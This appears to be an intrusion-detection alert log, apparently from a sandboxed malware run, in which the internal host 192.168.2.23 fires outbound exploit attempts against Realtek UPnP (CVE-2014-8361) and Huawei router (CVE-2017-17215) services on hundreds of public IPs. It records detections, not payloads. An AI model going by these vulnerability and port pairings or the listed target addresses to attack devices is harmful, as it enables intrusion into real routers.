                                      07/20/24-23:01:02.509396TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615318252869192.168.2.23187.26.13.206
                                      07/20/24-23:01:42.115778TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615972052869192.168.2.2387.53.250.191
                                      07/20/24-23:01:31.323043TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25634252869192.168.2.23143.157.68.18
                                      07/20/24-23:01:58.556960TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5590852869192.168.2.2379.25.231.52
                                      07/20/24-23:01:24.882291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976437215192.168.2.2341.253.111.233
                                      07/20/24-23:01:04.986393TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615714252869192.168.2.2323.225.3.54
                                      07/20/24-23:01:08.555687TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4253052869192.168.2.2347.237.197.200
                                      07/20/24-23:01:00.633744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3496237215192.168.2.23197.194.243.184
                                      07/20/24-23:01:51.067695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23864852869192.168.2.2318.233.238.80
                                      07/20/24-23:01:44.007374TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3601052869192.168.2.234.9.166.109
                                      07/20/24-23:02:27.457367TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615915452869192.168.2.23157.69.166.230
                                      07/20/24-23:01:42.115230TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25504852869192.168.2.23221.103.3.16
                                      07/20/24-23:01:42.145997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6047652869192.168.2.23177.64.16.178
                                      07/20/24-23:01:43.825430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4171252869192.168.2.23101.42.79.184
                                      07/20/24-23:01:09.081648TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4056452869192.168.2.23129.27.232.7
                                      07/20/24-23:01:42.704900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25356852869192.168.2.23135.205.140.164
                                      07/20/24-23:01:52.487978TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24033052869192.168.2.23182.62.146.57
                                      07/20/24-23:01:02.127340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041037215192.168.2.23157.86.17.89
                                      07/20/24-23:02:08.291319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4170452869192.168.2.23140.127.134.199
                                      07/20/24-23:01:51.864479TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615788252869192.168.2.23111.225.128.216
                                      07/20/24-23:02:06.884162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4153652869192.168.2.2327.214.50.214
                                      07/20/24-23:01:47.032369TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25657252869192.168.2.2331.139.123.246
                                      07/20/24-23:01:20.132103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968437215192.168.2.23107.152.95.200
                                      07/20/24-23:01:43.474436TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24106652869192.168.2.23186.139.241.135
                                      07/20/24-23:01:42.357440TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4391852869192.168.2.23128.83.244.58
                                      07/20/24-23:00:59.154068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325237215192.168.2.2372.152.128.124
                                      07/20/24-23:01:08.614193TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24008652869192.168.2.23162.220.3.30
                                      07/20/24-23:01:12.806645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4008052869192.168.2.23213.27.181.202
                                      07/20/24-23:01:54.515977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5593652869192.168.2.2351.202.3.15
                                      07/20/24-23:01:25.472685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5850052869192.168.2.2359.21.137.98
                                      07/20/24-23:01:24.876750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618637215192.168.2.23157.230.17.56
                                      07/20/24-23:01:13.289823TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613435852869192.168.2.2385.161.3.79
                                      07/20/24-23:01:25.200191TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5758452869192.168.2.2336.69.228.71
                                      07/20/24-23:01:42.145997TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613479652869192.168.2.2382.91.121.224
                                      07/20/24-23:01:50.202477TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5277852869192.168.2.23192.56.35.207
                                      07/20/24-23:01:24.943244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741637215192.168.2.23197.211.52.185
                                      07/20/24-23:01:40.294677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4381437215192.168.2.23121.47.221.188
                                      07/20/24-23:01:44.870961TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613421652869192.168.2.2312.215.198.66
                                      07/20/24-23:01:47.818739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614459452869192.168.2.2393.74.58.220
                                      07/20/24-23:02:48.447183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3787452869192.168.2.2378.236.82.99
                                      07/20/24-23:01:14.090830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169237215192.168.2.23197.222.148.4
                                      07/20/24-23:01:59.992285TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614703252869192.168.2.2393.39.228.144
                                      07/20/24-23:01:00.633744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728837215192.168.2.2341.191.248.36
                                      07/20/24-23:01:12.806839TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5320452869192.168.2.23195.196.57.80
                                      07/20/24-23:01:02.104572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4433237215192.168.2.2341.132.238.252
                                      07/20/24-23:01:03.924344TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614065052869192.168.2.2324.106.184.126
                                      07/20/24-23:01:31.331748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4018652869192.168.2.2384.102.198.205
                                      07/20/24-23:01:00.645051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295637215192.168.2.2341.12.12.126
                                      07/20/24-23:01:51.197215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5998252869192.168.2.23216.19.121.71
                                      07/20/24-23:01:00.636533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136837215192.168.2.23157.229.17.57
                                      07/20/24-23:01:42.588824TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23342052869192.168.2.23218.206.46.127
                                      07/20/24-23:01:48.958887TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4312252869192.168.2.23110.158.170.123
                                      07/20/24-23:01:08.562013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25478452869192.168.2.2390.243.193.156
                                      07/20/24-23:01:43.023857TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24261052869192.168.2.23129.7.216.73
                                      07/20/24-23:01:04.050503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801237215192.168.2.23197.88.18.128
                                      07/20/24-23:01:40.349275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091437215192.168.2.23170.167.238.210
                                      07/20/24-23:01:44.142024TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25776852869192.168.2.2354.188.109.169
                                      07/20/24-23:01:47.858878TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25840852869192.168.2.239.44.236.192
                                      07/20/24-23:00:59.154067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958237215192.168.2.2341.138.150.155
                                      07/20/24-23:01:31.974551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904037215192.168.2.2341.130.110.142
                                      07/20/24-23:01:41.389908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614850452869192.168.2.2337.169.126.92
                                      07/20/24-23:01:42.751824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3724052869192.168.2.23107.79.192.172
                                      07/20/24-23:01:48.602356TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4453452869192.168.2.2337.247.244.116
                                      07/20/24-23:01:02.081923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5062652869192.168.2.23161.203.121.55
                                      07/20/24-23:01:08.584506TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4256652869192.168.2.2349.39.36.55
                                      07/20/24-23:01:45.078068TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614656252869192.168.2.2317.182.173.35
                                      07/20/24-23:01:24.877747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243637215192.168.2.23157.34.170.95
                                      07/20/24-23:01:41.321505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614949252869192.168.2.23198.228.131.204
                                      07/20/24-23:01:46.971627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5601652869192.168.2.2317.24.227.79
                                      07/20/24-23:01:51.172994TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613987252869192.168.2.23200.203.33.61
                                      07/20/24-23:01:51.144153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614733052869192.168.2.23187.4.24.206
                                      07/20/24-23:01:50.332163TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4933052869192.168.2.23162.125.127.147
                                      07/20/24-23:01:42.632446TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25076652869192.168.2.23149.51.58.185
                                      07/20/24-23:01:44.839991TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613868852869192.168.2.2352.182.197.150
                                      07/20/24-23:01:42.399678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4429652869192.168.2.23141.137.71.180
                                      07/20/24-23:02:11.752225TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614831852869192.168.2.2318.237.154.16
                                      07/20/24-23:01:47.859927TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5321652869192.168.2.23108.210.234.252
                                      07/20/24-23:01:42.290838TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615289652869192.168.2.2383.99.82.220
                                      07/20/24-23:01:10.513310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694652869192.168.2.2398.89.247.140
                                      07/20/24-23:01:57.762774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5783052869192.168.2.23182.21.209.138
                                      07/20/24-23:01:44.674122TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4705452869192.168.2.23179.149.63.116
                                      07/20/24-23:01:31.325694TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24084252869192.168.2.23201.230.67.6
                                      07/20/24-23:01:51.949637TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23549652869192.168.2.23125.174.13.114
                                      07/20/24-23:01:43.841155TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24964652869192.168.2.23130.167.196.86
                                      07/20/24-23:01:42.486106TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615472852869192.168.2.23193.19.81.156
                                      07/20/24-23:01:43.110964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4060052869192.168.2.2325.194.48.207
                                      07/20/24-23:01:27.650243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883837215192.168.2.23220.166.48.209
                                      07/20/24-23:01:14.117066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5538637215192.168.2.23219.249.103.135
                                      07/20/24-23:00:57.221803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323037215192.168.2.2346.47.224.132
                                      07/20/24-23:01:46.416206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5933652869192.168.2.2396.94.31.193
                                      07/20/24-23:01:53.357099TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25350452869192.168.2.2348.97.254.151
                                      07/20/24-23:01:25.766611TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615103252869192.168.2.2371.185.104.236
                                      07/20/24-23:01:42.629036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4527652869192.168.2.23211.87.162.144
                                      07/20/24-23:01:45.980258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3284052869192.168.2.2397.24.147.38
                                      07/20/24-23:01:46.046177TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5273252869192.168.2.23202.170.123.220
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082037215192.168.2.23157.226.98.85
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4532637215192.168.2.23157.140.56.8
                                      07/20/24-23:01:45.452336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3946652869192.168.2.2363.211.43.107
                                      07/20/24-23:01:25.540121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085652869192.168.2.23100.45.46.163
                                      07/20/24-23:01:46.620479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3968452869192.168.2.2323.141.254.89
                                      07/20/24-23:01:40.331150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466437215192.168.2.23197.218.83.13
                                      07/20/24-23:01:40.331150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964037215192.168.2.2341.212.160.245
                                      07/20/24-23:01:47.893677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613410652869192.168.2.2391.148.233.46
                                      07/20/24-23:01:52.599834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24813652869192.168.2.23162.239.164.172
                                      07/20/24-23:00:57.223887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133037215192.168.2.23197.148.93.189
                                      07/20/24-23:01:00.638418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937037215192.168.2.23190.161.188.69
                                      07/20/24-23:01:09.030401TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23344052869192.168.2.23135.23.236.194
                                      07/20/24-23:01:12.807274TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23761252869192.168.2.2382.106.122.253
                                      07/20/24-23:01:52.393089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5843652869192.168.2.23132.247.218.225
                                      07/20/24-23:02:06.131728TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615988252869192.168.2.2361.92.48.14
                                      07/20/24-23:01:46.512162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4897252869192.168.2.2347.135.155.164
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693037215192.168.2.23197.200.193.163
                                      07/20/24-23:01:43.659105TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23632452869192.168.2.2399.176.241.96
                                      07/20/24-23:01:49.033216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5951652869192.168.2.2371.235.237.254
                                      07/20/24-23:02:48.156942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613543052869192.168.2.23186.52.228.17
                                      07/20/24-23:01:04.786751TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5589452869192.168.2.2365.136.207.183
                                      07/20/24-23:01:42.072139TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4531652869192.168.2.23145.93.255.182
                                      07/20/24-23:01:50.483105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4988252869192.168.2.2341.3.232.51
                                      07/20/24-23:01:20.591862TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25699452869192.168.2.23213.215.4.32
                                      07/20/24-23:01:00.634165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060837215192.168.2.2341.222.48.132
                                      07/20/24-23:01:42.592140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3664452869192.168.2.2334.44.162.23
                                      07/20/24-23:01:42.699478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613752652869192.168.2.23105.139.214.54
                                      07/20/24-23:01:42.131607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3375052869192.168.2.23157.252.110.127
                                      07/20/24-23:02:00.484578TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615803852869192.168.2.23199.27.212.72
                                      07/20/24-23:01:53.844694TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615109052869192.168.2.23112.42.28.225
                                      07/20/24-23:01:52.285244TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25551452869192.168.2.23129.174.206.130
                                      07/20/24-23:01:11.188768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615249452869192.168.2.2362.245.86.200
                                      07/20/24-23:02:08.008782TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613675852869192.168.2.23168.26.102.58
                                      07/20/24-23:01:34.045749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876637215192.168.2.23197.84.25.49
                                      07/20/24-23:01:42.551511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3358052869192.168.2.2342.245.92.167
                                      07/20/24-23:01:20.132103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344637215192.168.2.2341.117.151.237
                                      07/20/24-23:01:53.909434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4627052869192.168.2.2349.96.236.62
                                      07/20/24-23:01:31.325400TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23894252869192.168.2.2361.172.152.113
                                      07/20/24-23:01:43.117484TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4878052869192.168.2.2357.81.97.111
                                      07/20/24-23:01:44.991829TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5846052869192.168.2.23202.1.176.48
                                      07/20/24-23:01:25.517399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5090052869192.168.2.23220.87.191.244
                                      07/20/24-23:01:57.688478TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616097052869192.168.2.23102.142.123.212
                                      07/20/24-23:01:02.055683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4556237215192.168.2.23164.204.194.37
                                      07/20/24-23:01:48.118060TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24915452869192.168.2.23162.125.127.147
                                      07/20/24-23:01:14.113390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701437215192.168.2.2341.9.205.142
                                      07/20/24-23:01:44.683789TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3453052869192.168.2.2357.222.50.62
                                      07/20/24-23:01:52.599833TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614854052869192.168.2.2388.29.130.31
                                      07/20/24-23:01:44.311969TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24429252869192.168.2.232.84.107.116
                                      07/20/24-23:01:56.510714TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24070052869192.168.2.23198.12.218.135
                                      07/20/24-23:01:02.127340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057037215192.168.2.23197.165.85.196
                                      07/20/24-23:01:08.559170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5199252869192.168.2.23114.57.93.253
                                      07/20/24-23:01:47.870904TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4661052869192.168.2.23187.174.160.150
                                      07/20/24-23:01:09.817737TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5294252869192.168.2.2344.188.193.15
                                      07/20/24-23:01:56.504220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4502652869192.168.2.23189.167.254.123
                                      07/20/24-23:01:43.180913TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615338252869192.168.2.23129.164.36.164
                                      07/20/24-23:01:40.320408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888637215192.168.2.23143.182.102.65
                                      07/20/24-23:01:49.329746TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25354252869192.168.2.2362.188.56.156
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3739837215192.168.2.23197.105.28.46
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385637215192.168.2.2341.149.70.228
                                      07/20/24-23:01:25.969609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4189652869192.168.2.23113.130.121.87
                                      07/20/24-23:01:53.175676TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615963852869192.168.2.23184.241.110.129
                                      07/20/24-23:01:24.883171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4687037215192.168.2.2341.51.233.253
                                      07/20/24-23:01:54.672544TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3485252869192.168.2.23132.173.198.51
                                      07/20/24-23:01:44.895849TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613512852869192.168.2.23125.174.13.114
                                      07/20/24-23:01:40.291616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163637215192.168.2.23197.40.0.63
                                      07/20/24-23:01:41.259813TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4031052869192.168.2.23129.151.175.195
                                      07/20/24-23:01:31.979752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506037215192.168.2.2341.131.219.214
                                      07/20/24-23:01:02.324877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5547052869192.168.2.23143.198.233.204
                                      07/20/24-23:01:31.976649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947637215192.168.2.23197.165.97.37
                                      07/20/24-23:01:20.124696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3910437215192.168.2.2341.163.165.19
                                      07/20/24-23:01:54.901420TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24442852869192.168.2.23219.217.14.87
                                      07/20/24-23:01:27.651332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228637215192.168.2.23197.146.181.144
                                      07/20/24-23:01:50.280308TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25586252869192.168.2.23213.162.26.171
                                      07/20/24-23:01:51.266338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498852869192.168.2.23113.178.52.80
                                      07/20/24-23:01:52.569791TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25198852869192.168.2.232.77.241.40
                                      07/20/24-23:01:43.227281TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5981652869192.168.2.23155.22.111.5
                                      07/20/24-23:01:52.089079TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4622652869192.168.2.23119.145.77.109
                                      07/20/24-23:01:08.919725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4675852869192.168.2.2312.55.180.198
                                      07/20/24-23:01:08.574948TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23912052869192.168.2.23153.0.45.254
                                      07/20/24-23:01:11.149832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4157652869192.168.2.2351.49.44.101
                                      07/20/24-23:01:49.454456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5689852869192.168.2.2319.194.171.63
                                      07/20/24-23:01:04.114673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773637215192.168.2.23197.52.94.108
